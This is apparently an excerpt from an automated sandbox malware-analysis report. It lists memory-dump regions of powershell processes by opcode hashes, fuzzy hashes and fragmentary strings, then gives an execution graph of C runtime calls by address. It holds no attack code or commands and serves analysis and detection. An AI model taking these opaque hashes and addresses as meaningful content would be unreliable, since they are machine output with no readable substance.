                  • Opcode Fuzzy Hash: ad5aac15e186f9a301af36ef1ba5798178c7e76d7d9b45bf3fd8e94b3c25e16b
                  • Instruction Fuzzy Hash: 282213D7A1D7D24FE7079E7CD8650E97FA0DF5326970944F7C6C48B0A3E909180A87A2
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 91a49401f042ed3e41a4045c57fa4b21e61c1a05b51393bc23ba1f189b6467bb
                  • Instruction ID: d64363d2f662fa97610bfac00983693aeb2fe30755deead463b0b77ddc65433c
                  • Opcode Fuzzy Hash: 91a49401f042ed3e41a4045c57fa4b21e61c1a05b51393bc23ba1f189b6467bb
                  • Instruction Fuzzy Hash: 9771959791DBD24FE31A9B3C99A64D57FA0EF5326870940F7C3C59B0A3D909340A8762
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$(f^l$(f^l$(f^l$(f^l$(f^l$(f^l$x.Ok$-Ok
                  • API String ID: 0-3706885464
                  • Opcode ID: 3717a85e16b072e8b419bb8aebcdb7763399f7a60c45ef4cd0f1e7b9b84b7bb1
                  • Instruction ID: bb931b4bb516b84607c6ebdcd18930ed43d1e3479563385fbb3aac70f8e329c1
                  • Opcode Fuzzy Hash: 3717a85e16b072e8b419bb8aebcdb7763399f7a60c45ef4cd0f1e7b9b84b7bb1
                  • Instruction Fuzzy Hash: 5A6250B0E00215DFDB24DF68C954BAAB7F2FB89714F1485A9D9066B741CB31EC82CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$(f^l$(f^l$(f^l$Tl$Tl
                  • API String ID: 0-2428336515
                  • Opcode ID: 509c3130c72b690b6a1084764341eca6963f6a23c7d80d72c2f64dc0199ac8fa
                  • Instruction ID: ab01b3b981bf1f3e1d2a22da86849d54f73d41d307de1785b30e0a3dcc0b2b8c
                  • Opcode Fuzzy Hash: 509c3130c72b690b6a1084764341eca6963f6a23c7d80d72c2f64dc0199ac8fa
                  • Instruction Fuzzy Hash: 61622DB8A003159FDB14CF98C958BA9B7F2EB89704F54C069D90A9F395CB72EC42CB51
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$x.Ok$x.Ok$-Ok
                  • API String ID: 0-21961828
                  • Opcode ID: 33ee28a4cbf075372e9db59f69ee7983637281617df489346b23c31405bce8be
                  • Instruction ID: 7a8091c3493313659b1caceee93e8f7cd9de17de1bde8cd91ad0dc09598705a0
                  • Opcode Fuzzy Hash: 33ee28a4cbf075372e9db59f69ee7983637281617df489346b23c31405bce8be
                  • Instruction Fuzzy Hash: D9F140B0A002199FEB24DB68CD55FAAB7F3FB89300F14C095D50A6F791CB71AD828B51
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$(f^l$(f^l$x.Ok
                  • API String ID: 0-592224846
                  • Opcode ID: ee8323517195750370600380931278274a65f82a8ef382dd5acbea941d2bae98
                  • Instruction ID: e547011eb6ce5e907f38011daf31a3263c77c7de487ba6698562131b186e2595
                  • Opcode Fuzzy Hash: ee8323517195750370600380931278274a65f82a8ef382dd5acbea941d2bae98
                  • Instruction Fuzzy Hash: 36B17CB4A10305DFD714DBA8C855BAEB7F3AB89301F688469D5066F791CF32EC418B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$Tl
                  • API String ID: 0-1077957362
                  • Opcode ID: ef3425b03cfecfbe0e30318c464dd4d94364881455ad8c2c83996e91273c5c80
                  • Instruction ID: 56d5d8c56c805b049934d485a912fdce5ffe14a87c81bbb8fe324324fbf56d52
                  • Opcode Fuzzy Hash: ef3425b03cfecfbe0e30318c464dd4d94364881455ad8c2c83996e91273c5c80
                  • Instruction Fuzzy Hash: D2522AB8A002559FDB14CF54C558BA9B7F2FB89304F59C099D909AF396CB72EC42CB41
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$x.Ok
                  • API String ID: 0-1850434022
                  • Opcode ID: e662d9393138a2224b7fcc1ba5500c5309b656071021354896318b7b83d3460c
                  • Instruction ID: 74e86933af5a6ec28c04f806707ecc414e58c6ba094bdc3729d381490440f0b6
                  • Opcode Fuzzy Hash: e662d9393138a2224b7fcc1ba5500c5309b656071021354896318b7b83d3460c
                  • Instruction Fuzzy Hash: 5DA17CB4A00305DFD714DB64C845BAEBBF3AF8A315F588069E4066B791CB32EC41CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: x.Ok$-Ok
                  • API String ID: 0-3458450161
                  • Opcode ID: 704b07b0d8fe04ba23bab9385ded662a8b0daa5a440e1d28042d354f6bf0b35e
                  • Instruction ID: 418dcc14c3ffbc9fc76cc13c660f021de123991904afd7fa746afa9a2d455b44
                  • Opcode Fuzzy Hash: 704b07b0d8fe04ba23bab9385ded662a8b0daa5a440e1d28042d354f6bf0b35e
                  • Instruction Fuzzy Hash: 4BD19FB0E003059FDB18DF68C455B9EB7B3AB89711F29C059D9066F386CB75EC428B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: x.Ok$-Ok
                  • API String ID: 0-3458450161
                  • Opcode ID: de3c9cbcdb72289a6b6c32146a0207278b4ad2628af47821085b8184b1d8a3ca
                  • Instruction ID: b15feeb62e48ee66ce118262bc5844079b3515f33e8c772a70d2145d9c4e4ed3
                  • Opcode Fuzzy Hash: de3c9cbcdb72289a6b6c32146a0207278b4ad2628af47821085b8184b1d8a3ca
                  • Instruction Fuzzy Hash: D1B19CB0E003059FDB14CF64C854B9EBBB2BB89715F29C059D9066F386CB75E846CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l
                  • API String ID: 0-1755624182
                  • Opcode ID: b488ada6d9ec3e4baa7c50c82a8b6266d7ae07fa2b5e283a666f837fcdfd1442
                  • Instruction ID: 534dc23ae1cfe37eaa659a230e3aff9f6947fe39fa99019cbf31088e085c9d67
                  • Opcode Fuzzy Hash: b488ada6d9ec3e4baa7c50c82a8b6266d7ae07fa2b5e283a666f837fcdfd1442
                  • Instruction Fuzzy Hash: 37E12AB8A002059FDB14CF54C958FA9B7B2FB89304F58C099D9099F796DB32EC42CB81
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l
                  • API String ID: 0-1755624182
                  • Opcode ID: ae9c77bddd1f7a77869620a84f7d7d80a2643c52511d2a213e6d287490cdf7ce
                  • Instruction ID: 5c163bd431ea1b8c8d1af727addd32178c9de1517ea48a046b4a8e9a7fdc1ceb
                  • Opcode Fuzzy Hash: ae9c77bddd1f7a77869620a84f7d7d80a2643c52511d2a213e6d287490cdf7ce
                  • Instruction Fuzzy Hash: CDD129B8A00215DFDB14CF54C558EA9B7B2FB89714F58C099D90A9F396CB32EC42CB81
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 84\l
                  • API String ID: 0-1706261813
                  • Opcode ID: 778d70b7dc4b8e76405d250dad2d7723b8c381456a2b0fc4672ed713531cbc8d
                  • Instruction ID: aeeae5d29da3e50b2fabba432fdea0185a61c9ce2362521c2f9327e8066eace8
                  • Opcode Fuzzy Hash: 778d70b7dc4b8e76405d250dad2d7723b8c381456a2b0fc4672ed713531cbc8d
                  • Instruction Fuzzy Hash: 3D41E8B0A053859FC7158B688818B66BFB1AF86314F1DC5DBD8469F293CB329C45C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: x.Ok
                  • API String ID: 0-278779807
                  • Opcode ID: 1d8bee567f700d2e1becf0399aba1d893ccb6dabcbda174f28129c2bbd27c50c
                  • Instruction ID: ba2ad1013aaa111697dd4b6e0c8bd181e5865acf72e893accec0e2f88331fbdf
                  • Opcode Fuzzy Hash: 1d8bee567f700d2e1becf0399aba1d893ccb6dabcbda174f28129c2bbd27c50c
                  • Instruction Fuzzy Hash: 4C3185B4B40204AFE7149B64C855FAEB7A7BBC5705F25C024E9016F3D2CF75AC428BA2
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbcd3ea4f3c34859a55ef9ac5900855697eb82a55ba9e89cfb40434875398eb5
                  • Instruction ID: bc63ead46f672ebf6501ff6befef7590a841cab21ba6cc2059f0fbdda7ef7ba0
                  • Opcode Fuzzy Hash: cbcd3ea4f3c34859a55ef9ac5900855697eb82a55ba9e89cfb40434875398eb5
                  • Instruction Fuzzy Hash: 97E117F1B043058FDB159F799815BBABBE69FC6211F1880AAD40ACF791DB31D842C7A1
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c9f4932ffdeaeb2b24be0ccfa70cba556115ec6f7ba38609ade80489ec3fa9c
                  • Instruction ID: 5392e63565ff9d7555fbc9fec564eae6234775c235b7f44790fe7b9ddedcb115
                  • Opcode Fuzzy Hash: 9c9f4932ffdeaeb2b24be0ccfa70cba556115ec6f7ba38609ade80489ec3fa9c
                  • Instruction Fuzzy Hash: 2CD1E7F1B003858FDB149B79D4286AABBE6AFC6311B1880BAD507DB391DB31E941C761
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68e6f13a01debacbb9e7b860ca9285894082f6e3587121b5171489e556b85696
                  • Instruction ID: a8f7921332c30c18184dc23609d8f3fc8c70247a7809ba003a2db300bb002fc1
                  • Opcode Fuzzy Hash: 68e6f13a01debacbb9e7b860ca9285894082f6e3587121b5171489e556b85696
                  • Instruction Fuzzy Hash: 6D7125B17043469FC7158B78882876ABBB6FFC6211F1880AAD956CB351CB31C886C7A1
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08513f2ec6589c2b70dd112722ba1cf549efdb6060cda140f8c06bb6e5783e7f
                  • Instruction ID: 4b81799bdfa57f8f9b7bdd37d4d51a40be6843a589602d65d89b5332fc91677a
                  • Opcode Fuzzy Hash: 08513f2ec6589c2b70dd112722ba1cf549efdb6060cda140f8c06bb6e5783e7f
                  • Instruction Fuzzy Hash: 4E51F5F0B003468FCB289B79846876A77E6AF89300B1CC46AC907CB755DB35EC46C761
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f1a77bf6ac41c4c60dff3590d055b57fe9d6e25bddeb8f48c00b1d2c7911acb
                  • Instruction ID: 6ab4bf76b2b40caf8daa294e2ee327d7bec2e52f05c61e4e1703f34ecee1cfc3
                  • Opcode Fuzzy Hash: 2f1a77bf6ac41c4c60dff3590d055b57fe9d6e25bddeb8f48c00b1d2c7911acb
                  • Instruction Fuzzy Hash: 555114B16043859FDB268F75C8487A57FB1AF82310F2DC1D6D81A8F292DB35C886D761
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9d49ea17242057214f2ae2c51b93b1abdd975100a80be9496a9eda9882f3743
                  • Instruction ID: 26216ebf7323a64f0a9b969be7ca0c062ede203fde860a771367d9441d627306
                  • Opcode Fuzzy Hash: c9d49ea17242057214f2ae2c51b93b1abdd975100a80be9496a9eda9882f3743
                  • Instruction Fuzzy Hash: 7241B2F0B003868FCB248E748568B7977E6AF86310B1CC4A6D9039B755DB35ED45CB62
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ab12b4136621dc434a9acbc306bdacc0cf69363c7ab3aeb7f1ac430d109b307
                  • Instruction ID: c2f60f61733b5f451922576ccf4c7dea80a39430c149c19bcd42fe8d7643880d
                  • Opcode Fuzzy Hash: 6ab12b4136621dc434a9acbc306bdacc0cf69363c7ab3aeb7f1ac430d109b307
                  • Instruction Fuzzy Hash: C34129F0A00202CFCB258F759806B797BE2AF86351F1D81E9D90A9F762C735D845C761
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e8b2a44545cd803b7903effc9680abfa4481a01e737198ff92985b80eb0197c
                  • Instruction ID: 15cef5a602aca0996d3f63e0bb5ccee2eb373f2d5a97dfce0aa9aa7cddf07432
                  • Opcode Fuzzy Hash: 1e8b2a44545cd803b7903effc9680abfa4481a01e737198ff92985b80eb0197c
                  • Instruction Fuzzy Hash: 123107F1B00345DFDB11CE3888697BA7BB6BF85251F1D816AD90A8B351C735C881C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 84\l$84\l$84\l$84\l$`BPk
                  • API String ID: 0-467955920
                  • Opcode ID: dbddee0b0902cea42eddacc15502413076e98e4a23d8a260939cb81ab43a1c34
                  • Instruction ID: 414ce53f732e8c2b593dc3f69512575750e939aa9d6c9cec4cc2d5328cd30a00
                  • Opcode Fuzzy Hash: dbddee0b0902cea42eddacc15502413076e98e4a23d8a260939cb81ab43a1c34
                  • Instruction Fuzzy Hash: 330295B1B00219DFDF18DF64C858A6ABBA6BF89711F18C065E9469F351CB31DC82CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 84\l$84\l$84\l$84\l
                  • API String ID: 0-3626634769
                  • Opcode ID: eb059e2086243c8f73e050f08da57800dff5c925dfc3d6c0d12dd3092033fa76
                  • Instruction ID: d00430db86ab168f97994179b10c39cc52723766bdf695562da0e4479d82bd73
                  • Opcode Fuzzy Hash: eb059e2086243c8f73e050f08da57800dff5c925dfc3d6c0d12dd3092033fa76
                  • Instruction Fuzzy Hash: D5A1DA71B00215DFDB289F64C849B6AB7E6BF89712F1C8499EC069B354CB32DD41C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: TNk$DUNk$XY^l$XY^l
                  • API String ID: 0-142392903
                  • Opcode ID: 79056ecfc49d30079a7943635651fb857212340382eeea2cc836bd01d34150a3
                  • Instruction ID: 9d4adab6fa0fb68b1d28bb817540cd4dbfa7c89b5a5a4a9787c6798ce4d53cb1
                  • Opcode Fuzzy Hash: 79056ecfc49d30079a7943635651fb857212340382eeea2cc836bd01d34150a3
                  • Instruction Fuzzy Hash: DD91FAB1B04216CFCF159B79D9586AABBE29FCA211F1CC0BAD506CB355DB31C882C761
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$(f^l$(f^l
                  • API String ID: 0-1287301838
                  • Opcode ID: 694455b9fcbeb4fa5b01de43275599d157dcecaff352f98dfb74d96fefdfb82f
                  • Instruction ID: 03e8677bd08945513225d08c61b30878feb571ed8f67fa0291d73384f7668162
                  • Opcode Fuzzy Hash: 694455b9fcbeb4fa5b01de43275599d157dcecaff352f98dfb74d96fefdfb82f
                  • Instruction Fuzzy Hash: FB9141B4E00317DBDB64CFA4C844AAEB7B2BF86724F18C519D8166B754C771E882CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1768538588.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (f^l$(f^l$(f^l$(f^l
                  • API String ID: 0-1287301838
                  • Opcode ID: d7275ce82ba54a15ee8b6968fb69e7691c733dc2465df564f6849a08d6870299
                  • Instruction ID: 011025486616ea8b76c4e33dc633a762e6c327b643ca0d6d1c5b8ed0f753c11c
                  • Opcode Fuzzy Hash: d7275ce82ba54a15ee8b6968fb69e7691c733dc2465df564f6849a08d6870299
                  • Instruction Fuzzy Hash: BC7152F0A00206DFD714DF68C894AAABBF2BF89324F18C569D9069B755CB31EC41CB91

                  Execution Graph

                  Execution Coverage:2.6%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:2.6%
                  Total number of Nodes:1662
                  Total number of Limit Nodes:5
                  execution_graph 7706 20de281c 7707 20de2882 std::exception::exception 27 API calls 7706->7707 7708 20de282a 7707->7708 6087 20de4bdd 6088 20de4bec 6087->6088 6089 20de4c08 6087->6089 6088->6089 6090 20de4bf2 6088->6090 6113 20de6d60 6089->6113 6092 20de6368 __dosmaperr 20 API calls 6090->6092 6094 20de4bf7 6092->6094 6110 20de62ac 6094->6110 6095 20de4c33 6117 20de4d01 6095->6117 6101 20de4c66 6103 20de6368 __dosmaperr 20 API calls 6101->6103 6102 20de4c72 6104 20de4d01 38 API calls 6102->6104 6105 20de4c6b 6103->6105 6106 20de4c88 6104->6106 6107 20de571e _free 20 API calls 6105->6107 6106->6105 6109 20de571e _free 20 API calls 6106->6109 6108 20de4c01 6107->6108 6109->6105 6129 20de6231 6110->6129 6112 20de62b8 6112->6108 6114 20de4c0f GetModuleFileNameA 6113->6114 6115 20de6d69 6113->6115 6114->6095 6150 20de6c5f 6115->6150 6119 20de4d26 6117->6119 6120 20de4d86 6119->6120 6636 20de70eb 6119->6636 6121 20de4c50 6120->6121 6122 20de70eb 38 API calls 6120->6122 6123 20de4e76 6121->6123 6122->6120 6124 20de4e8b 6123->6124 6125 20de4c5d 6123->6125 6124->6125 6126 20de637b __dosmaperr 20 API calls 6124->6126 6125->6101 6125->6102 6127 20de4eb9 6126->6127 6128 20de571e _free 20 API calls 6127->6128 6128->6125 6130 20de5b7a __dosmaperr 20 API calls 6129->6130 6131 20de6247 6130->6131 6132 20de62a6 6131->6132 6136 20de6255 6131->6136 6140 20de62bc IsProcessorFeaturePresent 6132->6140 6134 20de62ab 6135 20de6231 ___std_exception_copy 26 API calls 6134->6135 6137 20de62b8 6135->6137 6138 20de2ada _ValidateLocalCookies 5 API calls 6136->6138 6137->6112 6139 20de627c 6138->6139 6139->6112 6141 20de62c7 6140->6141 6144 20de60e2 6141->6144 6145 20de60fe ___scrt_fastfail 6144->6145 6146 20de612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6145->6146 6147 20de61fb ___scrt_fastfail 6146->6147 6148 20de2ada _ValidateLocalCookies 5 API calls 6147->6148 6149 20de6219 GetCurrentProcess TerminateProcess 6148->6149 6149->6134 6170 20de5af6 GetLastError 6150->6170 6152 20de6c6c 6190 20de6d7e 6152->6190 6154 20de6c74 6199 20de69f3 6154->6199 6157 20de6c8b 6157->6114 6160 20de6cce 6163 20de571e _free 20 API calls 6160->6163 6163->6157 6164 20de6cc9 6165 20de6368 __dosmaperr 20 API calls 6164->6165 6165->6160 6166 20de6d12 6166->6160 6223 20de68c9 6166->6223 6167 20de6ce6 6167->6166 6168 20de571e _free 20 API calls 6167->6168 6168->6166 6171 20de5b0c 6170->6171 6174 20de5b12 6170->6174 6172 20de5e08 __dosmaperr 11 API calls 6171->6172 6172->6174 6173 20de637b __dosmaperr 20 API calls 6175 20de5b24 6173->6175 6174->6173 6176 20de5b61 SetLastError 6174->6176 6177 20de5b2c 6175->6177 6178 20de5e5e __dosmaperr 11 API calls 6175->6178 6176->6152 6179 20de571e _free 20 API calls 6177->6179 6180 20de5b41 6178->6180 6181 20de5b32 6179->6181 6180->6177 6182 20de5b48 6180->6182 6183 20de5b6d SetLastError 6181->6183 6184 20de593c __dosmaperr 20 API calls 6182->6184 6226 20de55a8 6183->6226 6185 20de5b53 6184->6185 6187 20de571e _free 20 API calls 6185->6187 6189 20de5b5a 6187->6189 6189->6176 6189->6183 6191 20de6d8a ___DestructExceptionObject 6190->6191 6192 20de5af6 _abort 38 API calls 6191->6192 6197 20de6d94 6192->6197 6194 20de6e18 _abort 6194->6154 6196 20de55a8 _abort 38 API calls 6196->6197 6197->6194 6197->6196 6198 20de571e _free 20 API calls 6197->6198 6375 20de5671 RtlEnterCriticalSection 6197->6375 6376 20de6e0f 6197->6376 6198->6197 6380 20de54a7 6199->6380 6202 20de6a26 6204 20de6a3d 6202->6204 6205 20de6a2b GetACP 6202->6205 6203 20de6a14 GetOEMCP 6203->6204 6204->6157 6206 20de56d0 6204->6206 6205->6204 6207 20de570e 6206->6207 6211 20de56de __dosmaperr 6206->6211 6209 20de6368 __dosmaperr 20 API calls 6207->6209 6208 20de56f9 RtlAllocateHeap 6210 20de570c 6208->6210 6208->6211 6209->6210 6210->6160 6213 20de6e20 6210->6213 6211->6207 6211->6208 6212 20de474f __dosmaperr 7 API calls 6211->6212 6212->6211 6214 20de69f3 40 API calls 6213->6214 6215 20de6e3f 6214->6215 6217 20de6e90 IsValidCodePage 6215->6217 6220 20de6e46 6215->6220 6222 20de6eb5 ___scrt_fastfail 6215->6222 6216 20de2ada _ValidateLocalCookies 5 API calls 6218 20de6cc1 6216->6218 6219 20de6ea2 GetCPInfo 6217->6219 6217->6220 6218->6164 6218->6167 6219->6220 6219->6222 6220->6216 6527 20de6acb GetCPInfo 6222->6527 6600 20de6886 6223->6600 6225 20de68ed 6225->6160 6237 20de7613 6226->6237 6229 20de55b8 6230 20de55c2 IsProcessorFeaturePresent 6229->6230 6231 20de55e0 6229->6231 6233 20de55cd 6230->6233 6267 20de4bc1 6231->6267 6235 20de60e2 _abort 8 API calls 6233->6235 6235->6231 6270 20de7581 6237->6270 6240 20de766e 6241 20de767a _abort 6240->6241 6242 20de5b7a __dosmaperr 20 API calls 6241->6242 6244 20de76a1 _abort 6241->6244 6246 20de76a7 _abort 6241->6246 6242->6244 6243 20de76f3 6245 20de6368 __dosmaperr 20 API calls 6243->6245 6244->6243 6244->6246 6266 20de76d6 6244->6266 6247 20de76f8 6245->6247 6252 20de771f 6246->6252 6284 20de5671 RtlEnterCriticalSection 6246->6284 6248 20de62ac ___std_exception_copy 26 API calls 6247->6248 6248->6266 6254 20de777e 6252->6254 6256 20de7776 6252->6256 6263 20de77a9 6252->6263 6285 20de56b9 RtlLeaveCriticalSection 6252->6285 6254->6263 6286 20de7665 6254->6286 6257 20de4bc1 _abort 28 API calls 6256->6257 6257->6254 6260 20de5af6 _abort 38 API calls 6264 20de780c 6260->6264 6262 20de7665 _abort 38 API calls 6262->6263 6289 20de782e 6263->6289 6265 20de5af6 _abort 38 API calls 6264->6265 6264->6266 6265->6266 6293 20debdc9 6266->6293 6297 20de499b 6267->6297 6273 20de7527 6270->6273 6272 20de55ad 6272->6229 6272->6240 6274 20de7533 ___DestructExceptionObject 6273->6274 6279 20de5671 RtlEnterCriticalSection 6274->6279 6276 20de7541 6280 20de7575 6276->6280 6278 20de7568 _abort 6278->6272 6279->6276 6283 20de56b9 RtlLeaveCriticalSection 6280->6283 6282 20de757f 6282->6278 6283->6282 6284->6252 6285->6256 6287 20de5af6 _abort 38 API calls 6286->6287 6288 20de766a 6287->6288 6288->6262 6290 20de77fd 6289->6290 6291 20de7834 6289->6291 6290->6260 6290->6264 6290->6266 6296 20de56b9 RtlLeaveCriticalSection 6291->6296 6294 20de2ada _ValidateLocalCookies 5 API calls 6293->6294 6295 20debdd4 6294->6295 6295->6295 6296->6290 6298 20de49a7 _abort 6297->6298 6299 20de49bf 6298->6299 6319 20de4af5 GetModuleHandleW 6298->6319 6328 20de5671 RtlEnterCriticalSection 6299->6328 6306 20de49c7 6314 20de4a3c 6306->6314 6317 20de4a65 6306->6317 6329 20de527a 6306->6329 6307 20de4aae 6310 20debdc9 _abort 5 API calls 6307->6310 6308 20de4a82 6339 20de4ab4 6308->6339 6315 20de4ab3 6310->6315 6312 20de4669 _abort 5 API calls 6312->6317 6316 20de4a54 6314->6316 6332 20de4669 6314->6332 6316->6312 6336 20de4aa5 6317->6336 6320 20de49b3 6319->6320 6320->6299 6321 20de4b39 GetModuleHandleExW 6320->6321 6322 20de4b63 GetProcAddress 6321->6322 6326 20de4b78 6321->6326 6322->6326 6323 20de4b8c FreeLibrary 6324 20de4b95 6323->6324 6325 20de2ada _ValidateLocalCookies 5 API calls 6324->6325 6327 20de4b9f 6325->6327 6326->6323 6326->6324 6327->6299 6328->6306 6347 20de5132 6329->6347 6333 20de4698 6332->6333 6334 20de2ada _ValidateLocalCookies 5 API calls 6333->6334 6335 20de46c1 